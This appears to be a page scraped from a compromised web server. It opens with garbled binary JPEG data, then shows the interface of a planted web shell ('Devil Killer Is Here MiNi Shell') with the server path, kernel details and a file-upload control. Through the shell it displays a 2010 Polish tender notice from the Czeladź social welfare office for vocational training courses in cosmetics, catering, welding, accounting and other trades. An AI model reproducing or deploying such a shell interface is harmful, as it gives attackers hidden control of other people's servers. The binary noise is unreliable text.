JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100827/232857-N-2010.html

<p class="kh_header"><b>Czeladź: Szkolenia zawodowe oraz szkolenia z zakresu psychologiczno-doradczego w ramach projektu współfinansowanego ze środków EFS pt. Bez ograniczeń. Program zwiększenia kompetencji zawodowych i społecznych oraz aktywizacja na rynku pracy osób korzystających z pomocy Miejskiego Ośrodka Pomocy Społecznej w Czeladzi  w ramach PO KL 2007 - 2013 w  2010r</b><br>
<b>Numer ogłoszenia: 232857 - 2010; data zamieszczenia: 27.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. 17 Lipca 27, 41-250 Czeladź, woj. śląskie, tel. 032 2651442, faks 032 2656811 w. 18.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.czeladz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia zawodowe oraz szkolenia z zakresu psychologiczno-doradczego w ramach projektu współfinansowanego ze środków EFS pt. Bez ograniczeń. Program zwiększenia kompetencji zawodowych i społecznych oraz aktywizacja na rynku pracy osób korzystających z pomocy Miejskiego Ośrodka Pomocy Społecznej w Czeladzi  w ramach PO KL 2007 - 2013 w  2010r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia
Przedmiotem zamówienia jest usługa obejmująca organizowanie i przeprowadzenie szkoleń  zawodowych, szkoleń  w formie treningu umiejętności i kompetencji społecznych w dziedzinie rozwoju osobistego oraz  doradztwo zawodowe i poradnictwo prawne dla podopiecznych MOPS, w ramach projektu współfinansowanego ze środków EFS pt. Bez ograniczeń. Program zwiększenia kompetencji zawodowych i społecznych oraz aktywizacja na rynku pracy osób korzystających z pomocy Miejskiego Ośrodka Pomocy Społecznej w Czeladzi  w ramach PO KL 2007 - 2013 w  2010r
CPV:
80 50 00 00 - 9 usługi szkoleniowe
80 53 00 00 - 8 usługi szkolenia zawodowego
79 14 00 00 - 7 doradztwo prawne 
85 31 23 20 - 8 doradztwo zawodowe
80 57 00 00 -  0 usługi szkolenia w dziedzinie rozwoju osobistego
Charakterystyka przedmiotu zamówienia: 
Zamówienie zostało podzielone na 11 części od I do XI
Realizacja zamówienia polega na wykonaniu n/w usług:
Część I
80 50 00 00 - 9 usługi szkoleniowe
Nazwa kursu/szkolenia: Kurs kosmetyczny i wizażu, manicure, pedicure, stylizacji paznokci + dodatkowy moduł profesjonalnej obsługi klienta z obsługą kasy fiskalne.
Usługi szkolenia zawodowego wraz ze świadczeniem usług opieki nad dziećmi na czas trwania zajęć. 
Liczba osób:  4 osoby i 1 dziecko objęte opieką
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2010r.
Miejsce szkolenia
Kurs powinien odbywać się na terenie województwa śląskiego do 20km od Czeladzi. Dojazd będzie możliwy poprzez środki komunikacji miejskiej KZK GOP. W związku z tym sala wykładowa lub pomieszczenie w którym będą prowadzone warsztaty musi znajdować się w bliskiej odległości od tych miejsc. Koszty transportu ponosi Zamawiający.
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 300 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna =  45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do piątku po max 7 godz. lekcyjnych.
Przykładowy zakres tematyczny szkolenia
Zakres tematyczny kursu powinien m.in. obejmować:
- ABC Savoir Vivru,
-utrzymanie wyglądu i prezentacji osobistej,
- sztuka negocjacji z klientem,
- kultura obsługi klienta,
- podstawowe informacje dotyczące wyposażenia gabinetu w sprzęt, narzędzia, aparaty, materiały    i kosmetyki wykorzystywane w pracy,
- zasady bhp i p.poż. w pracy kosmetyczki,
- pielęgnacja skóry i twarzy,
- pielęgnacja oprawy oczu,
- zabiegi na ciało,
- elementy wizażu,
- elementy masażu,
- schorzenia skóry
- utrzymanie wyglądu i prezentacji osobistej,
- zajęcia z zakresu dermatologii, anatomii i higieny,
- manicure tradycyjny i biologiczny,
- masaż i pielęgnacja dłoni (m. in. zabieg parafinowania),
- pedicure,
- masaż i pielęgnacja stopy,
- stopy z problemami, (wrastające i narastające paznokcie, modzele, nagniotki, pękające pięty),
- pielęgnacja paznokci,
- rekonstrukcja płytki paznokciowej,
- zdobienie paznokci (m. in. manicure francuski),
- przyklejanie i zdobienie sztucznych paznokci,
- nakładanie tipsów metodą żelową i akrylową,
- historia makijażu,
- harmonia kolorów, barwy podstawowe, ich typologia, kompozycja i zastosowanie,
- stylizacja - określenie typu urody i sylwetki, dobór fryzury, ubioru, korekcji stylu, figury, twarzy, zastosowanie dodatków,
- makijaż odpowiedni do typu urody,
- techniki kamuflowania,
- makijaż dzienny, wieczorny, sporty visage, ślubny i fotograficzny,
- makijaż permanentny (teoria i praktyka): historia, cel, efekty, wskazania, i przeciwwskazania.
- obsługa kasy fiskalnej
Program zajęć powinien zawierać w szczególności:
- nazwę i zakres szkolenia,
- czas trwania i sposób organizacji szkolenia,
- wymagania wstępne dla uczestników szkolenia,
- cele szkolenia,
- plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej,
- treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
- wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
- sposób sprawdzania efektów szkolenia. 

Część II
kod CPV - 80530000-8 - usługi szkolenia zawodowego
Nazwa kursu/szkolenia: Kurs kucharz, barman, kelner  + dodatkowy moduł profesjonalnej obsługi klienta  z obsługą kasy fiskalnej 
Usługi szkolenia zawodowego wraz ze świadczeniem usług opieki nad dziećmi na czas trwania zajęć. 
Liczba osób: 7 osób i 2 dzieci objęte opieką
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2010r.
Miejsce szkolenia
Kurs powinien odbywać się na terenie województwa śląskiego do 20km od Czeladzi. Dojazd będzie możliwy poprzez środki komunikacji miejskiej KZK GOP. Koszty transportu ponosi Zamawiający.
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 300 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna =  45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do piątku po max 7 godz. lekcyjnych.
Przykładowy zakres tematyczny szkolenia
Program kursu powinien obejmować m.in.:
- bhp, zasady bezpieczeństwa żywności, HACCP,
- szkolenie z zakresu minimum sanitarnego,
- podstawowe informacje nt nazw, pojęć i określeń typowych w gastronomii,
- klasyfikacja surowców, półproduktów i gotowych wyrobów w zależności od pochodzenia 
i wartości odżywczej,
- warunki przechowywania surowców i półproduktów,
- rozpoznanie zmian w surowcach i półproduktach stosowanych w gastronomii,
- identyfikacja i wykorzystanie informacji zawartych na opakowaniach,
- obliczanie surowców i półproduktów potrzebnych do sporządzania potraw, przewidywanie czasu potrzebnego na wykonanie potraw,
- dobieranie narzędzi, naczyń, maszyn i urządzeń do wykonywania czynności,
- techniki przyrządzania potraw,
- obliczanie wartości energetycznej i odżywczej przygotowanych potraw,
- zestawienia potraw,
- skutki niezgodnego z normami wykorzystania surowców i półproduktów,
- dobieranie surowców i technik wykonania potraw w zależności od diety,
- zasady przygotowania potraw z wybranej kuchni regionalnej,
- estetyka podawania potraw,
- sylwetka barmana - kelnera,
- utrzymania wyglądu i prezentacji osobistej,
- ABC Savoir Vivru,
- sprzęt barowy
- techniki miksowania napojów,
- organizacja i technika pracy w cocktail barze,
- kultura obsługi klienta,
- techniki obsługi klienta na Sali,
- rozliczenia i wydawanie rachunków,
- podstawowe czynności kelnerskie,
- zasady obsługi baru, bufetu,
- obsługa kasy fiskalnej.
Program zajęć powinien zawierać w szczególności:
- nazwę i zakres szkolenia,
- czas trwania i sposób organizacji szkolenia,
- wymagania wstępne dla uczestników szkolenia,
- cele szkolenia,
- plan nauczania określający tematy  zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej,
- treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
- wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
- sposób sprawdzania efektów szkolenia.

Część III
kod CPV - 80530000-8 - usługi szkolenia zawodowego
Nazwa kursu/szkolenia: Kurs florysty i artystycznego układania roślin z elementami decoupage
 + dodatkowy moduł profesjonalnej obsługi klienta z obsługą kasy fiskalnej 
Usługi szkoleniowe wraz ze świadczeniem usług opieki nad dziećmi na czas trwania zajęć. 
Liczba osób: 7 osób i 1 dziecko objęte opieką
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2010r.
Miejsce szkolenia
Kurs powinien odbywać się na terenie województwa śląskiego do 20km od Czeladzi. Dojazd będzie możliwy poprzez środki komunikacji miejskiej KZK GOP.  Koszty transportu ponosi Zamawiający.
Liczba godzin szkolenia
Zajęcia winny obejmować minimum 200 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna = 45 min). Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do piątku po max 7 godz. lekcyjnych.
Przykładowy zakres tematyczny szkolenia
Program kursu winien obejmować minimum następujący zakres tematyczny:
ABC Savoir Vivru,
utrzymanie wyglądu i prezentacji osobistej,
zagadnienia z handlu hurtowego i detalicznego,
zagadnienia z zakresu marketingu i reklamy,
sztuka negocjacji i rozmowy z klientem,
wykonanie kompozycji okolicznościowych (bukiety z kwiatów ciętych, suchych sztucznych, aranżacje w 
naczyniach), kompozycji świątecznych (stroiki wielkanocne i bożonarodzeniowe,ikebany), florystykę 
komunijną, ślubną i pogrzebową,przystrajanie pomieszczeń na imprezy okolicznościowe typu: ślub, 
komunia, przyjęcia biznesowe,przystrajanie stołów na przyjęcia okolicznościowe,kompozycje nasadzane 
w doniczkach do wnętrz.
suszenie i utrwalanie roślin: przygotowanie roślin do suszenia, techniki suszenia i przechowywania, dobór
gatunków roślin,teorie wykonanie kompozycji okolicznościowych (ślubne, komunijne, pogrzebowe,
okolicznościowe),dobór gatunków roślin do bukietów i kompozycji, techniki wykonania układów roślin,
artystyczne pakowanie przedmiotów, tworzenie bilecików, elementy decoupage ( m.in. na drewnie, 
metalu, szkle, ceramice).
inne techniki rękodzieła użytkowego( robienie biżuterii, filcowanie itp.)
obsługa kasy fiskalnej
Program zajęć powinien zawierać w szczególności:
- nazwę i zakres szkolenia,
- czas trwania i sposób organizacji szkolenia,
- wymagania wstępne dla uczestników szkolenia,
- cele szkolenia,
- plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej,
- treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
- wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
- sposób sprawdzania efektów szkolenia.

Część IV
kod CPV - 80530000-8 - usługi szkolenia zawodowego
Nazwa kursu/szkolenia : Kurs spawania metodą MAG i TIG

Usługi szkolenia zawodowego. 
Liczba osób: 6 osób 
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2010r.
Miejsce szkolenia
Kurs powinien odbywać się na terenie województwa śląskiego do 20 km od Czeladzi. Dojazd będzie możliwy poprzez środki komunikacji miejskiej KZK GOP. Koszty transportu ponosi Zamawiający.
Liczba godzin  i program szkolenia
Szkolenie winno zostać przeprowadzone na podstawie programu zgodnego z wytycznymi Instytutu Spawalnictwa w Gliwicach Ośrodek Kształcenia i Nadzoru Spawalniczego. Ma ono za zadanie przygotować jego uczestników do egzaminu w zakresie podstawowego spawania metodą TIG - elektrodą nietopliwą w osłonie gazu obojętnego - 141 materiałowa 1.1. oraz podstawowego spawania metodą MAG -  elektrodą topliwą w osłonie gazów aktywnych - 135  materiałowa 1.1
Zajęcia teoretyczne i praktyczne winny odbywać się w dni robocze od poniedziałku do soboty po max 7 godz. lekcyjnych (godzina szkolenia = godzina lekcyjna =  45 min).
Program zajęć powinien zawierać w szczególności:
- nazwę i zakres szkolenia,
- czas trwania i sposób organizacji szkolenia,
- wymagania wstępne dla uczestników szkolenia,
- cele szkolenia,
- plan nauczania określający tematy  zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej,
- treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
- wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
- sposób sprawdzania efektów szkolenia.

Część V
kod CPV - 80530000-8 - usługi szkolenia zawodowego
Nazwa kursu/szkolenia: Profesjonalna obsługa firmy  - kurs księgowości, kadry, płace, ZUS + Moduł asystencko - sekretarski + sztuka negocjacji 

Usługi szkolenia zawodowego. Przewidziano do przeszkolenia 3 osoby. 
Liczba osób: 3 osoby 
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2010r
Miejsce szkolenia
Kurs powinien odbywać się na terenie województwa śląskiego do 20km od Czeladzi. Dojazd będzie możliwy poprzez środki komunikacji miejskiej KZK GOP. Koszty transportu ponosi Zamawiający.
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 300 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna =  45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do piątku po max 7 godz. lekcyjnych.
Przykładowy zakres tematyczny szkolenia
Program kursu powinien obejmować m. in.:
I Księgowość:
 1. Podstawy i organizacja rachunkowości 
- zasady rachunkowości, 
- księgi rachunkowe i ich rodzaje, 
2. Konta księgowe 
- syntetyczne, 
- analityczne, 
- bilansowanie aktywów, 
- bilansowanie pasywów, 
- pozabilansowe, 
3. Sprawozdania finansowe i statystyczne. 
4. Bilans. 
5. Rachunek zysków i strat. 
6. Klasyfikacja kosztów. 
7. Rachunek przepływów pieniężnych 
- prowadzenie i przechowywanie dokumentacji, 
II Kadry,płace, ZUS: 
1. Prawo pracy po nowelizacji - źródła i zasady. 
2. Forma, treść, sposób zawierania i rodzaje umów o pracę.
3. Rozwiązanie umowy o pracę za wypowiedzeniem i bez wypowiedzenia, wygaśnięcie umowy.
4. Wynagrodzenie za pracę, za godziny nadliczbowe i za czas przestoju.
5. Regulamin wynagrodzenia za pracę.
6. Obowiązki pracodawcy w zakresie prowadzenia akt osobowych i dokumentacji związanej ze stosunkiem pracy.
7. Obowiązki pracownika wynikające z Kodeksu Pracy, wykazy obowiązków służbowych, zakresy odpowiedzialności.
8. Regulamin pracy. 
9. Czas pracy. Praca w godzinach nadliczbowych, w niedziele i święta.
10. Urlopy pracownicze.
11. Ochrona danych osobowych.
 Prawo ubezpieczeń społecznych 
1. Świadczenia z ubezpieczenia społecznego na wypadek choroby i macierzyństwa.
2. Rodzaje zasiłków, dokumentowanie prawa do zasiłków, podstawa wymiaru zasiłków
Naliczanie płac
1. Elementy składowe płac.
2. Ustalanie zaliczki na podatek dochodowy od osób fizycznych.
3. Dokumentacja wynagrodzeń. 
4. Obowiązki zakładu pracy przy rozliczaniu podatku dochodowego od osób fizycznych
5. Ewidencja płac.
6. Wykazanie danych o płacach w sprawozdaniu finansowym. 
III Moduł asystencko - sekretarski 
1.Organizacja pracy sekretariatu
2.Psychologia pracy sekretarki
3.Obsługa urządzeń biurowych 
IV Sztuka negocjacji
1. Style i techniki negocjacji
2. Sztuka negocjacji
3. Wizerunek negocjatora

Część VI
kod CPV - 80530000-8 - usługi szkolenia zawodowego
Nazwa kursu/szkolenia : Operator koparko - ładowarki wszystkie typy kl. III + Operator ładowarki jednonaczyniowej kl. III + Operator wózka widłowego
Usługi szkolenia zawodowego.
Liczba osób: 8 osób
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2010r
Miejsce szkolenia
Kurs powinien odbywać się na terenie województwa śląskiego do 20km od Czeladzi. Ddojazd będzie możliwy poprzez środki komunikacji miejskiej KZK GOP. Koszty transportu ponosi Zamawiający.
Liczba godzin  i program szkolenia
Szkolenie winno zostać zorganizowane zgodnie z rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. z 2001 r., Nr 118 poz. 1263).
Program szkolenia - minimum 300 godzin - musi zawierać m.in. następujące zagadnienia:część teoretyczna:
I. Operator koparko - ładowarki wszystkie typy kl. III 
1. dokumentacja techniczna maszyn roboczych,
2. bezpieczeństwo i higiena pracy przy eksploatacji maszyn roboczych
3. Podstawy elektrotechniki
4. Silniki spalinowe,
5. Elementy hydrauliki
6. technologii wykonywania robót ziemnych,
7. użytkowania i obsługi maszyn roboczych.
II. Operator koparko - ładowarki jednonaczyniowej kl. III
1. Budowa ładowarek jodnonaczyniowych
2. technologia robót ładowarką jednonaczyniową
III  Operator wózka widłowego
1. typy stosowanych wózków jezdniowych
2. czynności kierowcy w czasie pracy wózka
Część praktyczna obejmująca naukę eksploatacji maszyn roboczych w różnych warunkach terenowych              i technologicznych.
Szkolenie musi zakończyć się sprawdzianem przeprowadzonych przez komisję powołana przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie.
Zajęcia teoretyczne i praktyczne winny odbywać się w dni robocze od poniedziałku do soboty po max 7 godz. lekcyjnych (godzina szkolenia = godzina lekcyjna =  45 min).
Program szkolenia  musi być zgodny z właściwymi przepisami, a w szczególności z rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. z 2001 r., Nr 118 poz. 1263)
Program zajęć powinien zawierać w szczególności:
- nazwę i zakres szkolenia,
- czas trwania i sposób organizacji szkolenia,
- wymagania wstępne dla uczestników szkolenia,
- cele szkolenia,
-plan nauczania określający tematy  zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej,
- treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
- wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
- sposób sprawdzania efektów szkolenia.

Część VII
kod CPV - 80530000-8 - usługi szkolenia zawodowego
Nazwa kursu: Kurs opieki nad dziećmi, chorymi i osobami starszymi
Usługi szkolenia zawodowego wraz ze świadczeniem usług opieki nad dziećmi na czas trwania zajęć. 
Liczba osób: 6 osób i 1 dziecko objęte opieką
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2010r
Miejsce szkolenia
Kurs powinien odbywać się na terenie województwa śląskiego do 20km od Czeladzi. Dojazd będzie możliwy poprzez środki komunikacji miejskiej KZK GOP. Koszty transportu ponosi Zamawiający.
 Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 250 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna =  45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do piątku po max 7 godz. lekcyjnych.
Przykładowy zakres tematyczny szkolenia
Zakres tematyczny kursu powinien m.in. obejmować:
- stosowanie wybranych form komunikacji interpersonalnej oraz metod poznawania dziecka,   
- określanie potrzeb dziecka i sposobów ich zaspakajania,
- stosowanie podstawowych zasad i metod wychowania,
- wychowanie dziecka w środowisku instytucjonalnym,
- stosowanie wybranych zabaw i gier wpływających na rozwój dziecka,
- utrzymywanie w czystości skóry dziecka i jego otoczenia,
- zaspakajanie podstawowych potrzeb fizjologicznych dziecka,
- udzielanie pierwszej pomocy przedlekarskiej w stanach zagrożenia i zapobieganie urazowości,
- rola i zadania opiekuna osób starszych - sylwetka opiekuna, 
- zagadnienia związane z procesem starzenia się organizmu,
- anatomia i fizjologia wieku podeszłego, choroby wieku podeszłego (obserwacja chorego, pomiar parametrów),
- wybrane zagadnienia z psychologii społecznej, pomoc społeczna i współpraca ze środowiskiem podopiecznego i rodziną,
- pielęgnacja chorych (profilaktyka odleżyn oraz skutków długotrwałego unieruchomienia, aspekty pielęgnacyjne rehabilitacji),
- zasady udzielania pierwszej pomocy przedmedycznej,
- zasady żywienia ludzi starszych,
- wybran-opieka nad umierającymi i towarzyszenie śmierci, 
- zajęcia praktyczne,
Program zajęć powinien zawierać w szczególności:
- nazwę i zakres szkolenia,
- czas trwania i sposób organizacji szkolenia,
- wymagania wstępne dla uczestników szkolenia,
- cele szkolenia,
- plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej,
- treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
- wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
- sposób sprawdzania efektów szkolenia.

Część VIII
kod CPV - 80530000-8 - usługi szkolenia zawodowego
Nazwa kursu/szkolenia : Kurs malarz- tapeciarz - regipsiarz 

Usługi szkolenia zawodowego. 
Kurs powinien odbywać się na terenie województwa śląskiego do 20km od Czeladzi. Dojazd będzie możliwy poprzez środki komunikacji miejskiej KZK GOP. Koszty transportu ponosi Zamawiający.
Liczba osób:  3 osoby
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2010r.
Miejsce szkolenia
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 150 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna =  45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do soboty po max 7 godz. lekcyjnych.
Przykładowy zakres tematyczny szkolenia
Zakres tematyczny kursu powinien m.in. obejmować:
- wprowadzenie do zawodu malarz-tapeciarz-regipsiarz,
- podstawowe pojęcia z zakresu budownictwa,
- farby i materiały pomocnicze,
- nowoczesne metody wykorzystania tynków strukturalnych,
- rysunek techniczny,
- przepisy bhp i przeciwpożarowe,
- zajęcia praktyczne
Program zajęć powinien zawierać w szczególności:
- nazwę i zakres szkolenia,
- czas trwania i sposób organizacji szkolenia,
- wymagania wstępne dla uczestników szkolenia,
- cele szkolenia,
- plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej,
- treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
- wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
- sposób sprawdzania efektów szkolenia.

Część IX
kod CPV - 80530000-8 - usługi szkolenia zawodowego
Nazwa kursu: Kurs monter instalacji wod - kan-gaz

Usługi szkolenia zawodowego. 
Liczba osób: 2 osoby
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2010r.
Miejsce szkolenia
Kurs powinien odbywać się na terenie województwa śląskiego do 20km od Czeladzi. Dojazd będzie możliwy poprzez środki komunikacji miejskiej KZK GOP. Koszty transportu ponosi Zamawiający.
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 200 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna =  45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do soboty po max 7 godz. lekcyjnych.
Przykładowy zakres tematyczny szkolenia
Zakres tematyczny kursu powinien m.in. obejmować:
-Przepisy bhp, ochrona przeciwpożarowa, zasady udzielania pierwszej pomocy
-Czytanie projektu instalacji wodociągowej, kanalizacyjnej i gazowej
-Elementy instalacji wodociągowej
-Połączenie gwintowe rur stalowych ocynkowanych
-Połączenie lutowane rur miedzianych
-Połączenie zgrzewane rur z polipropylenowych
-Przygotowanie stanowiska pracy montera instalacji wodociągowej
-Montaż przewodów i uzbrojenia instalacji wodociągowej
